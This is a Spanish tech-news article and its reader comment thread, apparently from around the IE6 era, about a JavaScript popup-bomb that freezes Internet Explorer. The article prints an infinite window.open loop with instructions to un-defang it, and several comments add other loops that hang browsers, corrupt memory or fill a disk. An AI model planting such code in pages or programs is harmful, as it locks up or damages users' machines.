BandaAncha.eu

  • 🔍 en 📰 artículos ⏎
  • 🔍 en 👇 este 📰 artículo ⏎
  • 🔍 en 💬 foros ⏎
Regístrate Regístrate Identifícate Identifícate
  • 📰 Artículos

Internet Explorer DoS (window.open)

MurdockDj

Ésta mañana SecuriTeam publicaba un nuevo exploit que según parece afecta a todas las versiones de Internet Explorer(no han especificado ninguna), no obstante no he podido verificar que sea en todas las versiones. Se trata de una modificación sobre un JavaScript, de los más utilizados, el 'window.open();'.

La Síntaxis del Exploit es la siguiente:

<scr!pt>
var i;
i=0;
for(;;) {
i++;
window.open('http://www.bandaancha.st','Ventanita'+i,null);
}
</script>

Básicamente solo consiste en cambiar la !(<scr!pt>) por i(<script>).
Por el momento, nadie microsoft no ha anunciado nada al respecto.

PD: He modificado la sintaxis, por equivocación lo habia escrito al revés. ;)

💬 Comentarios

1
BocaDePez
BocaDePez
🗨️ 1
RedStar

Realmente el código no es un bug ni exploit... es como si haces un programa que reserve mucha memoria, se ponga a escribir en el disco duro información sin parar y similar.

Creo que otros exploradores tienen la ventaja de limitar el número de ventanas abiertas simultáneamente. En el caso de otros exploradores al cerrar las ventanas no se cuelga linux ni te hace un volcado de pila, ni error de kde ni nada. En windows he probado el opera y no se cuelga windows ni te da pantallazo azul.

El exploit viene precisamente por eso... no debería haber ningún problema a la hora de cerrar una aplicación (un sistema operativo real separa las aplicaciones de forma que si una cae no afecte al resto del sistema). El problema viene de dos partes... el Internet Explorer que invade el resto del sistema y del propio Windows que se deja invadir. ¿Alguien sigue diciendo que Windows es un sistema operativo? :)

moonshadow

lo acabo de probar con ie6 y simplemente sale como texto de la web. no se ejcuta nada.

CyNic

Para que funcione el exploit ay que cambiar la ! de script por una i, lo han puesto asi para que el explorer no ejecute el script, pillais¿, lo que hace esto es que no deja de abrir ventanas una detras de otra, pero basicamente no lo considero un fallo del explorer, mas bien codigo maligno porque lo unico que es, es un bucle infinito que cada vez abre una ventanita, molesto si que es, solo se puede quitar con ctrl-alt+spr, saludos!

P.D, como pone en securitifocus podeis probar el script simplemente poniendo esto en la barra de direcciones:

about:

🗨️ 1
gorrister

"Básicamente solo consiste en cambiar la i(<script>) por !(<scr!pt>). "

Como puedes ver, la nota está al revés es normal que la gente se confunda.

McClane

Acabo de probarlo en WinXP pro y al final (hasta cerrando con ctrl+alt+supr) termina petando el ie6. Como comentáis... algo molesto.

🗨️ 1
ximo1

pos yo lo he chapao despues de esperar q me abriera unas ventanitas con controlaltsupr y se ha cerrado. espero q lo pruebo otra vez...

otra vez se ha cerrado bien...

menuda mierda de fallo... q no paren de salirte popups porno es mas molesto q esto...

tengo: winxp he+ ie6

saludos

Bocapez

Wow, pedazo de vulnerabilidad, que raro que un megajeiker como tu nunca se haya preguntado porque se habren tantos popups en la paginas xxx.

Si se convierte en un problema para ti solo tienes que utilizar un programa como "Popup killer", "proxomitron" o desactivar el javascript en el navegador.

PS: Si!! un bocadepez registrado jurjur!!

🗨️ 2
Pergoletas

Cambia de foro y vacilale a tus compis de batallitas

🗨️ 1
GoFF

Esto ni es una vulnerabiliadd ni nada...sobran megajeikers...

PD: Lo de abrir muchas ventanitas ia se hacía de hac emucho tiempo con otras técnicas...un exploit? ja ja ja jakers jakers uH!!

BocaDePez
BocaDePez

Propongo que la noticia se quite de la portada, pq no hace más que bajar el nivel de contenidos de esta web.

¿Un exploit? Por favor... Y además se publica el código para que miles de chavalitos les de por joder la marrana.

🗨️ 1
BocaDePez
BocaDePez

que no hay que utilizar.

Creo que con noticias como esta, se esta demostrando dia a dia que navegador no has de utilizar....

Y que no me vengan diciendo de que ie no tiene competencia, la tiene y bastante mejor.

Quiza asi (publicando tal cual el exploit o como quiera llamarse), la gente se lo piense un poco mas antes de utilizar el programa ese.

BocaDePez
BocaDePez

Pos el Opera tiene una opción, "rechazar ventanas emergentes", algo muy util para impedir que las páginas te abran 100000 ventanas con publicidad, o para que códigos en javascript como este te puedan crear ventanas sin parar.

ximo1

xq me sale la noticia en portada el logo del netscape? ein? publicidad subliminal?

Bocapez

Dedicado a los que dicen que mozilla/netscape es "cool" y iexplorer una kk.

Poned este codigo en un .html y abridlo con el mozilla:

<script languaje=javascript>
function pozi() {
var i;
i=0;
for(;;){
i++;
document.write("Me creo juanker y no llego ni a zerocool");
}
}
</script>
<body onload="pozi();"
</body>

Ahora abridlo con iexplorer y me contais listillos...Y a ver si aprendemos a diferenciar entre vulnerabilidad y un mal uso.

🗨️ 9
BocaDePez
BocaDePez

Cual es la diferencia exacta???

A mi se me cuelgan los dos que da gusto.

La diferencia, es que en IE salen lo de que "tu" eres un juanker, y en el netscape no.

Q intentas demostrar?? Q programando mal salen las cosas mal??

🗨️ 1
Bocapez

Se cala el primero, y el segundo te dice "si deseas interrumpir la ejecucion del script"

Bocapez

Ahora que lo veo con detenimiento, el codigo este sobra:

var i;
i=0;
i++;

Quedaria tal que:

function pozi() {
for(;;){
document.write("Me creo juanker y no llego ni a zerocool");
}
}

🗨️ 5
BocaDePez
BocaDePez

Tu no has programado nada en tu puta vida, no?...

Dios mio... prueba a hacer algo parecido en C....

Sin acritud ;)

🗨️ 3
PisoDelMal02

o lo dices por un puntero loco? explica eso del C

ximo1

Tu no has programado nada en tu puta vida, no?...

Eso es un reto de programador o algo?

con apretar control-c se para xD

🗨️ 1
ximo1

Eso es un reto de programador o algo?

con apretar control-c se para xD

BocaDePez
BocaDePez

aprende a programar, y así no quedarás como un juanker...
por cierto, explicadme lo que hace porque a mi mozilla no le pasa nada...

hypnosys

Tanto una mala programación como un mal uso lleva a la vulnerabilidad.
Si por medio de un mal uso se llega a algún error, entonces es vulnerable por ese lado. Esto no es un error de programación, tampoco una explotación; sino q es un abuso. Y no por ser víctima de un abuso deja de ser vulnerable.
Pienso q sigue siendo válida la expresión de vulnerabilidad y q su relación sigue siendo muy estrecha.

.::hypnosys::.

BocaDePez
BocaDePez

creo,bueno creo no, ES simplemente un uso mas de javascript, en un bucle pones muchos window.open y a no ser q tires del taskmanager te abre muchas ventanitas . Pero eso es mas viejo q el mear

saludooos

🗨️ 1
SkYp0e7

Pues eso.

SkYp0e7

Tronco, cúrrate más las noticias y di algo interesante de verdad, que ultimamente lo que pones a la mayoría de la gente le parece una chorrada, inoportuno o archiconocido...

Y encima en portada, lo que hay que ver...

🗨️ 2
Pergoletas

Ya esta bien de tanto criticar, y haber si aportamos entre todo algo mas que criticas inutiles. Que sean criticas interesantes, no como el skyp0e7 que veo que se revana los sesos para dejar claro que no le gusta esta noticia.

Un saludo

🗨️ 1
SkYp0e7

... yo trato de hacer mis aportaciones enviando artículos siempre que puedo, si no los publican ya no es cosa mía.

Y creo que no soy el único al que no le gusta la "noticia". Es absurdo poner en portada ésto como si fuera la novedad del siglo XXI cuando los bucles infinitos existen desde siempre y más de una vez y de dos se pueden encontrar puteando cuando navegas por la WWW

En fin, cada uno es libre de opinar, pero las cosas no siempre se están haciendo bien por aquí...

GRiYoH

uhm...me lo parece a mi o la gente se ha vuelto loca???

alguien está diciendo que crear un algoritmo q desemboca en un bucle infinito representa un bug (y no del programa q lo contiene (en este caso el script creado por el usuario))???

debo entender entonces que un compilador es un programa lleno de 'bugs'??

ya no me extrañaría ver un post en que se diga que gcc/g++ tienen un bug...sí claro, si me salgo de la casilla de un array me pone "segmentation fault" y mi programa peta....fallo del compilador de C/C++ (pq como soy tan l33t no se me ha ocurrido pensar que lo que falla es mi algoritmo)...

no confundamos bugs de un programa como puede ser ie con no saber programar, el 'bug' es, en este caso, del script creado, nunca del intérprete/compilador/etc etc etc...

claro que siempre hay alguno que dice que "lo hago intencionadamente para colgar el ie"...sí, claro, es bastante obvio que si entras en un bucle infinito pase eso, así como cuando haces un bucle tal como este, te saque por pantalla desde 0 a 9998:

int sale=0,iteracion=0;

while (!sale){

printf ("%d\n",iteracion);

iteracion=iteracion++;

if(iteracion==9999){

sale=1;

}

}

...es que para eso está el lenguaje...o hay que considerarlo como el 'bug' del 9999 de los compiladores de C ???

GoFF

Sisi...últimamente se está haciendo muy jaker el *dj con temas en portada tan "interesantes" como este...Algún día nos contara como programar el exploit para petar cds.

(Para el que no sepa como es: Consiste en rallarlos)

f3l1n3

A ver... ah! vale, por ejemplo se me ocurre un exploit universal mucho más maligno válido para todas las máquinas habidas desde que yo recuerde, desde los 8 bits(msx, commodore, expectrum...) que adaptando un poco funciona en los equipos actuales:

10 POKE INT(RND*255) , INT(RND*65535) : GOTO 10

(Escribe datos aleatorios en direcciones aleatorias de memoria, sólo en los primeros 64kb para que funciones en ordenadores viejos)

O este tb sería muy majo:

10 OPEN "X.XXX" FOR OUTPUT AS #1 : PRINT #1,"JUASJUAS!" : GOTO 10

(abre un archivo y lo va llenando de "JUASJUAS!" hasta que se acabe el espacio del disco duro)

Estos malos usos (como bien han llamado antes) de la programación han existido y existiran siempre, si esto fuera una vulnerabilidad o un exploit estaríamos listos, vaya pedazo de lista habría.

P.D. Que tiempos aquellos... XD

🗨️ 3
BocaDePez
BocaDePez

xD

esto ni es exploit ni es nah fallos de estos siempre han estado presentes y estaran :D desde k se kreo la programacion

BocaDePez
BocaDePez

Pues realmente eso puede llegar a ser un exploit. Hacer un segment fault en un programa setuid...etc. Vamos q me refiero a que el 90% de los exploits se basan en algun tipo overflow. Ya sea de buffer,disco,etc..

Por cierto, tu "exploit" no haría nada en un sistema moderno, para eso existe la proteción de memoria

🗨️ 1
f3l1n3

XP

Creo que se sobrentiende lo que quería decir.

saludos

1